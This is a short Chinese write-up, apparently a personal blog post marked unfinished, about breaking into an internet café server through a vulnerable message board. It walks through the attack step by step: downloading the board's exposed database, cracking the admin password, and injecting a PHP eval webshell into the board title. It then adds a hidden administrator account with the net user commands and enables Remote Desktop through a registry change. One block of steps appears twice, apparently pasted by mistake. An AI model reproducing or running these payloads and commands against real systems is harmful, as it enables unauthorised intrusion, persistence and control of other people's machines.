记一次网吧渗透(未完)
网吧使用易游留言板,存在低级漏洞
http://www.fucktest.com:18897/eyooboard/include/data/message.db
得到数据库。文本文档打开,得到admin加密后密码
解密后登录后台,留言板标题插入一句话。
${${eval($_POST['cmd'])}}
报错,
本地搭建测试环境。查看configure.data.php。发现插进去是这样的。。
等管理员重装留言板后,再插。
${${eval($_POST[cmd])}}
成功,菜刀链接
接着
net user admin$ admin123 /add
net localgroup administrators admin$ /add
解密后登录后台,留言板标题插入一句话。
${${eval($_POST['cmd'])}}
报错,
本地搭建测试环境。查看configure.data.php。发现插进去是这样的。。
等管理员重装留言板后,再插。
${${eval($_POST[cmd])}}
成功,菜刀链接
接着
net user admin$ admin123 /add
net localgroup administrators admin$ /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
得到管理员。
mstsc链接
未完待续。。。
